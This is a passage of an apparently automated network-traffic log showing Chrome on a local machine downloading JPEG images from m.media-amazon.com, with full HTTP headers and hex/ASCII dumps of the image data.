                                                                                                                                                                                          X-Amz-IR-Id: 37bb2c0d-5697-4886-9b88-1d7a68cc6d3c
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 02 Mar 2020 23:26:35 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Wed, 19 Oct 2044 19:37:26 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 3357492
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200042-IAD, cache-ewr-kewr1740064-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 ad 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 00 06 03 01 00 00 00 00 00 00 00 00 00 00 00 00 03 04 06 07 08 01 02 05 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 5d a5 87 81 fd 2f 80 e6 e4 cc 6e e5
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6]/n
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 39 ad 0d 59 b5 b7 f0 24 78 46 d6 b7 7b 9e 2a b6 e9 d8 e5 7a 1f 14 41 b8 0d 59 78 33 03 12 42 84 c8 d9 4c 71 30 d7 33 19 1e 2b ea 39 f3 5b d2 9f 34 13 54 5e 98 c2 9d cc e8 f3 95 2d e5 28 27 24 f4 cc 23 95 5e b5 2a b9 6b 9f 38 92 e3 42 48 f5 61 ab 5e ee 05 bc de 2b ab 91 d4 7a a8 cc 07 e8 df 9a 74 75 3b 8b 38 ab 73 76 fa 16 f6 9c dc 07 c7 65 b2 95 56 cf 37 cd 80 ec 71 5b 39 b5 33 12 2c 71 e9 7c 20 d7 3a dd 98 a4 c7 11 5d bb a7 5a 52 cd c7 c6 47 8a fa 88 f3 53 d2 cf 35 13 54 4a 51 a5 d8 c7 6e 5e 56 c5 65 1c 99 6e 05 ab 4a d5 80 66 a4 6f ba 7c 12 a6 ea 52 3e e1 1e a9 22 63 c8 77 73 f8 35 7e 7f 8c 29 d1 51 11 fa 20 b6 bd 54 2a dc f1 a7 b6 1c c6 86 8d dc c7 70 f2 f6 76 af 5d cc 8b e4 55 7a f9 75 13 4b 1b 5e fd 27 85 40 99 42 6b f0 a8 20 e4 f2 5c c0 07 89 fa 8e
                                                                                                                                                                                          Data Ascii: 9Y$xF{*zAYx3BLq03+9[4T^-('$#^*k8BHa^+ztu;8sveV7q[93,q| :]ZRGS5TJQn^VenJfo|R>"cws5~)Q T*pv]UzuK^'@Bk \
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 80 39 dd 6c e9 b0 83 46 23 f7 11 31 ae 24 bc c9 1a 69 27 00 8d 0c 91 cb 06 56 ef 70 11 72 99 23 50 8e 44 8f 90 8e 55 3f 32 0c 96 e4 b0 02 35 36 45 c0 46 79 93 00 46 32 5e c2 0c 80 1a 29 ff 00 42 d8 0b 68 ab 08 ed 98 75 ac db d9 60 d5 c0 d3 c8 19 f5 00 02 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 2f 10 00 02 01 03 03 02 05 04 02 03 01 01 01 00 00 00 01 02 03 00 04 11 05 12 13 10 21 14 20 22 31 32 06 23 30 41 15 33 40 42 51 24 52 60 ff da 00 08 01 01 00 01 08 02 65 c7 6e 99 ff 00 1b 3e 6c d6 6b 3e 4c d0 91 85 5c da 09 aa 48 cc 47 0d f9 f3 e4 cf 4c f9 33 59 ac f4 cf e0 9a 05 94 61 ae 2d 9a dc f7 fc 38 ff 00 24 0c f5 65 0c 30 6e 2d 42 77 8f 8d ab 89 ab 8d ab 8d ab 8d ab 63 56 d3 5e de fc ab 5e 22 3a f1 31
                                                                                                                                                                                          Data Ascii: 9lF#1$i'Vpr#PDU?256EFyF2^)Bhu`/! "12#0A3@BQ$R`en>lk>L\HGL3Ya-8$e0n-BwcV^^":1
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 57 06 d6 5d f1 a9 3e f4 ce 10 65 af b5 61 02 a9 0e e5 89 27 4e f8 bd 24 58 2c c7 c3 9c 60 98 7b e4 08 31 4d 01 a1 1f a8 1a 96 1e 4c d3 40 58 36 5a 2f fe 42 e3 cd 73 fd d2 d0 a6 6d c7 a2 d2 d6 ea 26 97 03 bd 24 ce 87 b6 d0 d5 63 61 6b 77 85 a9 7e 9c db fd 77 16 ef 01 db 24 32 67 b1 97 e2 73 a4 14 79 30 e3 6e 3b 78 c5 3d a2 be d6 0e 40 52 79 32 dd 34 c8 0c 91 c8 56 52 72 80 34 bb 33 46 6e f8 a1 3f 6c d2 cd 93 8a 8d b7 d7 88 a6 97 01 a8 3e e3 4b 9f df 96 eb fb a6 a9 4f eb c9 bc d2 ad 33 62 8b 1a 0d ff 00 42 ff 00 c8 63 77 65 58 e1 63 b5 44 8f 1e ee c6 e7 46 2b 96 b6 ba 72 9e 93 1c c1 2b f9 a5 a6 3b bb b6 f2 2a 27 06 9a be 9c f8 4d 57 36 42 4f 52 b2 e0 f7 c7 4c 0e b8 ac 79 ee 7f be 6a 94 fa 8f 51 40 e2 83 51 ef d5 18 8a 8e 76 81 c4 89 6d 70 b7 b1 07 55 bd e3
                                                                                                                                                                                          Data Ascii: W]>ea'N$X,`{1ML@X6Z/Bsm&$cakw~w$2gsy0n;x=@Ry24VRr43Fn?l>KO3bBcweXcDF+r+;*'MW6BORLyjQ@QvmpU
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: f5 58 af 87 a5 7a 6b 77 2d 39 31 2d ad a0 63 90 22 58 be 11 20 cb 6f 32 49 01 dd 5a 66 a0 2e 54 67 a4 ae 23 52 c6 f2 f9 e7 6e de 1d e8 c2 e3 a6 87 11 ce ef cd a9 dc 5f 46 7f f3 ae 83 77 32 bc 87 4a b7 36 d6 f1 46 dd 6e 34 88 27 24 d4 d1 b2 3b ab 68 13 45 1c e3 91 7a 5e ce 77 4a a2 c8 ee f4 d1 b6 25 bb 39 31 32 86 81 d6 6f 9c 72 0b 69 42 ac 2f bc 67 a6 a4 e5 c8 8d 6d f4 80 07 dc fe 36 dc 53 e8 f0 9f 6b ad 3d a3 60 1a c6 2e 38 96 9e 74 8f e5 1d d2 4b d9 68 df 44 b5 0d f2 4a db 55 f5 08 a3 a8 ae 91 d4 b5 36 ab 12 d2 5e 46 e0 b5 3e ad 12 1a 8f 50 89 eb c5 c7 82 d4 da bc 4b 56 fa 82 4e 70 1e 74 8f e5 1c e8 ff 00 1a 96 65 88 65 a5 d6 f0 7d 30 6b 21 ce 1b 51 05 a3 2b 6d a6 e8 d1 da a2 6f 5e 8e 73 9a d3 e7 11 bf 77 b7 92 53 d9 ac 2e 17 de db 4c 67 ee 56 d7 6c 9b
                                                                                                                                                                                          Data Ascii: Xzkw-91-c"X o2IZf.Tg#Rn_Fw2J6Fn4'$;hEz^wJ%912oriB/gm6Sk=`.8tKhDJU6^F>PKVNptee}0k!Q+mo^swS.LgVl
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 1a 69 23 29 4b a4 4f b3 14 9a 34 ea c0 d7 f1 52 d7 f1 52 d6 99 a6 bd b4 85 9b ff 00 c2 ff 00 ff c4 00 2c 11 00 02 02 02 01 03 03 03 05 00 03 01 00 00 00 00 01 02 00 03 04 11 12 05 10 21 13 14 31 20 22 32 06 15 23 34 41 30 42 51 61 ff da 00 08 01 02 01 01 08 00 c4 eb 15 65 0d 1e 10 7f e4 f1 d8 7d 5e 26 a0 3d f5 38 18 d4 82 3e e0 c5 5b 92 e1 7e a1 57 02 bc 8f 7d 41 9e ff 00 1e 7b dc 79 ef 68 9e fa 89 ef a8 9e f6 89 ef 68 9e f6 99 ef a8 83 26 a7 3c 50 09 c6 71 9f fc 9a 96 df c0 6e 19 60 f8 82 05 9a 8d 61 1b 03 9f 80 60 3b fa 35 3a 37 f7 60 fa 37 0d 61 87 99 68 f0 20 82 31 89 53 1d b7 6f 4c 42 38 91 f4 74 6f ee 08 f8 db b5 f8 63 01 5d 9e a3 ad f5 b9 2a 9d b9 8e d6 7f 90 08 21 1b 9f 02 0d c7 c9 54 dc a2 cb 2f b9 ae 7e fd 1f fb a2 3e 3d 3e a9 b8 8a a9 60 10 55
                                                                                                                                                                                          Data Ascii: i#)KO4RR,!1 "2#4A0BQae}^&=8>[~W}A{yhh&<Pqn`a`;5:7`7ah 1SoLB8toc]*!T/~>=>`U
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 1f 3d bd db f9 83 3e c1 a8 3a a5 b1 ec 36 37 23 ff 00 3f ff c4 00 2e 11 00 02 02 01 03 03 03 03 03 05 01 01 00 00 00 00 01 02 03 04 00 05 11 12 06 10 21 13 14 31 15 22 35 20 32 41 07 16 23 30 42 25 71 ff da 00 08 01 03 01 01 08 00 d4 7a 6a 7a 0d b8 e7 e3 63 dc e1 5c d8 e6 ed 9e 73 73 9b 9c db 38 e7 1c e3 db 90 c5 9d 94 fd ad 1a ba 94 7d 4f a3 1e 22 66 a6 74 9b 83 3e 8f 73 3e 93 73 0e 93 73 3e 95 77 3e 93 73 3e 93 73 3e 93 73 3e 93 73 3e 93 73 24 a1 66 25 e5 28 63 9c b0 36 6d 9c 72 1a de a3 6d da bf fd 61 18 4e 12 72 3a e5 f6 27 d0 23 70 48 db b6 d9 b7 6e ab fc 56 0c db b0 c0 30 48 54 ee b9 5f fe b0 e6 d9 0d 45 3f 33 4c 8b b4 63 cf c8 e4 30 f1 23 75 ed b6 75 57 e2 8e 43 7c 08 23 12 db 26 68 7d 18 9a ac a8 aa ce 33 7c e0 7b 40 7f 76 13 8b 16 c3 7c 59 38 f9
                                                                                                                                                                                          Data Ascii: =>:67#?.!1"5 2A#0B%qzjzc\ss8}O"ft>s>ss>w>s>s>s>s>s$f%(c6mrmaNr:'#pHnV0HT_E?3Lc0#uuWC|#&h}3|{@v|Y8
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: e5 98 6b 7a 14 d7 68 d4 7a ba 85 85 ad d3 81 63 ad 11 a7 d3 45 a0 a3 a5 43 6b 41 34 d3 40 b3 26 99 72 c4 56 ef 6a 02 dd d9 ac e3 1d ce 55 84 42 16 cb c8 88 1c 38 d5 2e 84 8c 46 99 a5 75 a5 9d 33 fc 78 3f aa 74 b8 ee 5b a8 ab 6b 16 d4 ea 56 fa 22 93 d7 69 68 3f 54 ad 5d 3b e9 94 a1 d5 ec d7 89 e1 81 6c 48 92 09 56 df 58 ea 17 60 15 e6 fe ea be 69 7b 13 36 ab 6a c2 aa 4d 1e bf 76 28 0d 64 a9 ae db a2 49 ad 6b 5a b5 75 f9 d9 df b5 6b 6b 34 5c 50 c4 bf b2 3b ab 20 b0 de af e8 f5 5c 2f 0f d0 3c 67 23 9c ce 6e 7f 4d 52 12 a4 58 2d 80 e4 2e a8 91 7b 73 3b c6 fc 90 37 67 d5 e3 49 5a 22 2f a9 28 03 6a c1 49 05 75 94 74 2e b1 58 f5 01 3f ea 37 e5 03 ec f7 93 6f ea 19 35 59 2d 03 ca 9d 80 41 8f b3 69 d1 3b 99 19 74 f8 c1 18 d4 63 6f 91 a7 c4 a3 61 1d 75 8f 7e 3b 66
                                                                                                                                                                                          Data Ascii: kzhzcECkA4@&rVjUB8.Fu3x?t[kV"ih?T];lHVX`i{6jMv(dIkZukk4\P; \/<g#nMRX-.{s;7gIZ"/(jIut.X?7o5Y-Ai;tcoau~;f
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 0c 43 96 08 1a fe 13 23 61 50 6b a7 22 fc 26 75 af fc fb 7e 35 1a 1c 22 b3 44 19 d4 31 a4 73 b6 c9 08 e0 b8 ed 52 36 1f f1 f5 1e d6 c1 a1 c6 d1 8a 61 7d 85 18 a6 9f e8 8b 91 92 33 46 48 c2 f4 51 8d c8 c0 23 61 72 04 9a 5c 6d 0f 8c d5 29 6d 42 68 33 84 d6 b7 04 fc 11 7e 89 d9 1c 17 41 54 64 7c 44 05 2e cc 0d e5 7f 72 93 65 e0 a0 fc 06 79 aa a0 fc 10 78 c1 07 1e d0 88 26 5d 83 24 33 8b 85 d0 55 86 f5 01 d9 6f 7a 0f c1 64 0f 55 33 eb 05 0f e2 73 ef 59 ff 00 ea 9e de 96 8c 13 60 6a 8a 6d a2 bb 51 b4 39 33 0b c7 78 23 9d 85 ef 6d 02 80 e2 b9 b9 44 5e 50 3b 14 c6 69 be ae c8 c8 47 d9 54 45 18 91 b9 78 79 a2 3b c5 17 a7 77 97 86 88 ea 14 da 8c 5e f0 53 86 09 92 93 5c 0a 21 ed 14 64 5f 1a a9 35 30 bb d8 5e 1a 20 e0 29 89 e5 5e 14 5e 1a b2 ee 51 b1 9f 41 bd 76 9d
                                                                                                                                                                                          Data Ascii: C#aPk"&u~5"D1sR6a}3FHQ#ar\m)mBh3~ATd|D.reyx&]$3UozdU3sY`jmQ93x#mD^P;iGTExy;w^S\!d_50^ )^^QAv
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: d8 6d f6 8a b2 3e 0f 28 6b c1 c7 ea af 0a f0 66 3e 07 1c 7c 0f 81 fa 53 2f 80 56 28 04 51 40 38 29 df 63 94 c9 26 69 f7 df 88 11 70 51 40 22 e1 51 45 14 5c 14 51 45 14 50 70 22 b1 45 14 50 0f 4a 9c 4e 82 c1 b8 30 e2 26 c2 31 04 83 fa 07 0d b8 9b 89 bc 9b e8 48 d0 84 77 19 fd a9 fd 69 fd 69 fd c8 3f d8 9f d0 9f d6 84 37 ef 4f eb 4f e8 4f ee 4f e8 40 6d 63 51 c0 fa 8f 07 09 82 ea 1e 36 9e 50 62 15 e0 20 52 34 21 42 19 82 25 d0 a9 98 e0 9c 11 ed 53 35 2e 34 bc 00 38 af 05 20 0e 33 81 f7 9f 1c 0f 17 eb 08 87 13 63 16 66 60 40 e0 2b c0 23 24 04 e7 8e 42 e4 ed de 2c 34 77 39 bc f3 c9 57 b4 bf 57 6c 4f 50 83 5a 62 0a 89 4e ab 68 f6 19 da 14 68 02 12 17 9b 22 96 96 f4 32 53 f7 72 e0 7d 46 3e 0b d3 54 aa 03 c6 08 a9 36 1a f4 be 4c a1 0c 75 3f cf c4 ab 82 77 3f 80
                                                                                                                                                                                          Data Ascii: m>(kf>|S/V(Q@8)c&ipQ@"QE\QEPp"EPJN0&1Hwii?7OOOO@mcQ6Pb R4!B%S5.48 3cf`@+#$B,4w9WWlOPZbNhh"2Sr}F>T6Lu?w?


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          135192.168.2.1649878151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC445OUTGET /images/M/MV5BZDBkM2I3OTQtNmI3MC00ZjI1LTk3NzQtYzcwMWE2NTBjMGNiXkEyXkFqcGdeQXVyNDE5MTU2MDE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 31828
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 30b97245-0f98-423f-a41b-5b1adf37e08f
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Tue, 12 Dec 2017 16:31:27 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Wed, 14 Sep 2044 12:05:55 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2664202
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000035-IAD, cache-ewr-kewr1740062-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 00 02 08 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec 2d fd ae 6a ec 8f 6a a0 b7 57 8e
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6-jjW
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 5b ea 53 87 d6 ad 6e 6a 26 73 b3 35 c7 88 67 0b a6 9f 39 5f 3c a1 d8 c1 a4 98 39 1e bf 2d c7 ac f0 4f c0 72 20 04 0d ad aa a8 b0 d7 6b d6 6c a7 de 6f 54 6d 08 c3 ae c6 5a a2 09 67 a9 aa 51 72 b9 44 6d b5 f4 d5 15 12 21 d8 59 21 97 43 04 95 0e e0 8a d0 9d 0f ce 75 08 a2 52 1c 0e 7a 0b c6 aa 24 7c 6a de 15 90 f6 a3 93 65 d0 61 eb a1 30 af f5 00 0f f3 dd b5 39 76 fe a0 bb bc 73 2e 58 38 db 8d 5c 4b c9 6e 18 aa 9d 52 2f 06 1d a1 e9 3a 2b ac 38 b3 98 7d 5b 4d 5b 15 5e 76 4e c3 4f f9 db 79 de 5c cd d4 31 e3 be a6 d1 5d 77 73 d0 1a 64 65 d0 80 a7 81 b8 03 d1 37 d5 39 22 55 f4 fa 0a 0e 02 c9 db 40 36 de ec 84 1d 77 62 56 43 04 83 2b 9f 4d 93 24 a5 6f 9e 67 4a 1b 45 5b 95 16 fc 0b 10 67 ae bc 64 d3 68 f4 58 ae fa 68 36 c9 76 c8 12 fb bf 90 fa c3 99 78 8d b9 22 2e
                                                                                                                                                                                          Data Ascii: [Snj&s5g9_<9-Or kloTmZgQrDm!Y!CuRz$|jea09vs.X8\KnR/:+8}[M[^vNOy\1]wsde79"U@6wbVC+M$ogJE[gdhXh6vx".
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ef 23 65 5d 10 90 93 67 4c ee 69 57 59 95 ae 6d cb 73 9d a5 1a e1 7a 27 13 38 f9 bb 01 90 e9 b3 0d 0e b3 24 15 bb 7e 07 2a 59 cc f7 2b 5e ef 52 a6 5a d9 5b ad b2 7f bc 50 af 8c f3 d5 5c db d3 3d 6d cc ef 6a 82 de df c3 f7 3c ce b6 06 71 f9 66 49 07 c9 c6 49 15 71 22 c9 23 b1 eb 0b c9 2b 72 27 06 d1 c7 8a 94 da e9 a2 59 bc 29 2b 57 0d 2d 6d 5e 66 01 ee ae 61 82 be e6 5d 7b b6 65 4d b3 32 4d fc cc a9 ef b9 92 fd cc c9 3d cc c9 34 db 32 4c cc c9 33 33 24 f3 33 24 cf 33 25 7b 99 92 25 99 97 34 4b 32 e7 99 99 2d 36 d9 80 5f ff c4 00 32 10 00 02 02 02 01 03 02 06 02 01 04 02 03 01 00 00 01 02 00 03 04 11 12 05 10 21 13 31 14 15 20 22 32 41 23 33 42 24 30 34 51 40 52 06 43 50 61 ff da 00 08 01 01 00 01 08 02 ff 00 f1 f2 13 ef 69 8c 16 a3 e5 69 55 0c 0b 01 cb 92
                                                                                                                                                                                          Data Ascii: #e]gLiWYmsz'8$~*Y+^RZ[P\=mj<qfIIq"#+r'Y)+W-m^fa]{eM2M=42L33$3$3%{%4K2-6_2!1 "2A#3B$04Q@RCPaiiU
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 1f 22 34 ad b4 c2 01 b9 83 ec d1 ec b3 1b 82 d6 b7 5f 7d 8d 4c c5 1f 0d b9 cc 6b 73 3d 9a cd 99 89 66 45 55 1b 6a b6 ef 89 c3 ba d8 46 b7 0c e8 bf f2 50 fd 0f ef 0c 6e ee 78 8d 9b b2 4b 6c 05 b5 97 d9 ad 27 dc 38 9d 3b 40 b1 37 d2 2d f2 0e 3d a3 52 95 e2 20 ef 77 bf 7c df 71 18 ea 7b 4d fb 19 8f 5f 17 d4 b6 b5 b9 78 94 a5 d6 5f fc 4b e1 97 8d 22 14 24 6d 45 36 59 a4 b3 ab d9 ac 5b 25 ad c8 ee 19 d1 69 e7 75 7f 43 fb c3 1a 19 c7 97 89 96 79 b9 8d 5e e3 26 bb 78 98 95 35 9e c1 49 f0 5f 29 ab 76 d5 6e 2c 1c c0 ef 6f bf 7c ef 75 8f 1c 6c 6e 21 f6 96 5c 39 d6 c9 5b ec 4d cc c1 e0 4b 07 d9 a8 9f 88 84 ce a9 7a 53 5a d6 ee 35 07 99 d0 c8 0e 47 d0 f0 c6 86 39 e2 ac 7b b4 33 53 02 de 07 5d b2 70 79 12 c9 d3 ff 00 ae 27 91 de de f9 4c af a6 0c bb 30 4f dc a7 f2 d4
                                                                                                                                                                                          Data Ascii: "4_}Lks=fEUjFPnxKl'8;@7-=R w|q{M_x_K"$mE6Y[%iuCy^&x5I_)vn,o|uln!\9[MKzSZ5G9{3S]py'L0O
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 14 75 2f 50 26 e5 2f f7 a4 3d ec fd 43 0f 63 db 31 76 92 c9 b9 99 e5 2b 3d b5 35 3f 1f 24 ed ce cf 6b 0c 6f 7e fb 9b ec a0 86 49 93 52 fb 80 19 39 6b a6 e4 7d 8c 8d 90 fe b2 32 c5 7d 6a 53 46 ea 3b b9 00 65 98 c5 1e c7 56 b5 b9 d8 d3 5c 2d d4 3d f2 b2 45 25 76 18 38 d8 b1 b8 02 d0 66 9d f9 6e d6 5c a7 62 35 3b 96 e2 9f d6 4f f5 54 0a 2e e3 a7 1e cc 7d 53 a0 b8 6d fb 38 62 36 13 6e 65 d4 b4 b7 15 23 c8 9f 2d 5d 41 e7 b5 55 35 bf 82 74 df fd be 5a 91 f1 6c 5f 22 c7 52 65 37 fa 4e 0c 6f bf 42 1f 73 2a c8 64 3a ab e1 1d c9 67 5c 65 5f 22 d5 e7 bd be 1b 54 76 0f 7e ad ef 5c c5 b7 d3 68 e9 cf 60 ae 17 9f 37 38 48 cc 5f de 16 51 ef 2f 5d ea 2f db 18 93 08 f5 3e c5 aa 91 50 d0 9b 1d b3 aa f1 ce 59 fa 87 3e c2 ba ed 8b 83 cb ef b3 b7 8d cd 4c ec 60 ca 6c 14 2f 37
                                                                                                                                                                                          Data Ascii: u/P&/=Cc1v+=5?$ko~IR9k}2}jSF;eV\-=E%v8fn\b5;OT.}Sm8b6ne#-]AU5tZl_"Re7NoBs*d:g\e_"Tv~\h`78H_Q/]/>PY>L`l/7
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: b2 a5 db 27 f8 cc 7b fd 17 0f 2d ac 5a a5 4d 38 ed 65 9e 9c d0 ad 7c 5d 4d f7 31 62 e8 c9 e1 b1 2b e1 55 62 75 45 dd 5b 98 bf db 57 d7 f2 f4 95 e1 84 f3 2b a0 57 ec 30 13 5c 63 61 ab 79 87 4a 36 d6 51 43 31 66 54 c6 3e cb e8 e9 5a 6a 83 05 78 eb ad 2e b4 35 db ae fb d3 3a 5a 6a ad ca df 91 79 8d 48 a1 38 ca 5b d4 44 69 41 05 17 8c ea df d0 60 fd 76 c4 56 5a 90 35 36 56 d6 dc 16 6a 67 d7 ea 64 f1 99 96 7a 75 3b 4c 9a fd 44 75 98 9f db 4f fb 2d cf fc 48 b7 f5 ab 63 d7 63 a3 29 6c 47 66 67 9f 00 da e3 3d 33 c4 08 98 8e 38 98 98 4d c7 89 ef d7 7f fa 66 22 f1 aa b1 30 2c e5 66 48 99 8f c2 9b 0c c2 3f c3 54 a6 df 47 26 da ce 7e 2f ae 9e 35 e3 b6 05 1e b3 8d e5 5f e8 a1 69 55 86 96 0c 01 5b 56 5f 47 a0 e5 27 4e af 95 c0 c6 50 de 08 8a 9e 9e 48 5f f6 8f 89 f1 55
                                                                                                                                                                                          Data Ascii: '{-ZM8e|]M1b+UbuE[W+W0\cayJ6QC1fT>Zjx.5:ZjyH8[DiA`vVZ56Vjgdzu;LDuO-Hcc)lGfg=38Mf"0,fH?TG&~/5_iU[V_G'NPH_U
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: b0 a0 60 43 55 52 a2 f5 59 b0 63 26 a0 3e 25 56 3e 0e 58 f5 32 02 1b 8d a8 04 b2 8b 6a 29 7f c9 62 c2 81 86 a1 ad 94 18 cc 55 4b 4c 2c 87 be 93 6b f5 97 a3 85 fe 2a 16 ee bb bd 44 eb 0d 5e 76 37 d4 79 66 ea 06 8b 53 6d c0 9b 6a 15 3b 58 6d c7 66 a1 82 e0 a2 8c 41 5b 18 a0 93 a0 b3 a9 1e e5 76 08 86 97 03 cf 1a ba a3 ac 3e 0e 89 25 8f 83 5b 80 49 ae d0 ea 18 32 91 ef b9 e9 31 13 d3 65 f0 7e 8c fa 85 d6 da 1a c0 02 fe 96 ed 59 59 56 0b 52 9a 87 da 56 74 c0 c7 f0 41 80 93 e4 f7 9f 52 7b 75 62 a1 4e d5 76 ed 19 fa 8d 04 b7 cf 52 de 1e 76 2d 00 00 78 39 1f d6 fb 47 bd 95 fc 56 3c 6e 7a 87 7a 02 d2 41 07 7e 04 53 a2 0c 04 b9 9a d0 84 6b cc 6c aa 95 4d 8c 1f d6 50 ea aa b5 80 0b a7 b1 9e a2 7b c3 b6 69 e8 80 3c f5 d8 04 00 14 90 c5 c0 fc 7e 98 3e 89 df fa 84 15
                                                                                                                                                                                          Data Ascii: `CURYc&>%V>X2j)bUKL,k*D^v7yfSmj;XmfA[v>%[I21e~YYVRVtAR{ubNvRv-x9GV<nzzA~SklMP{i<~>
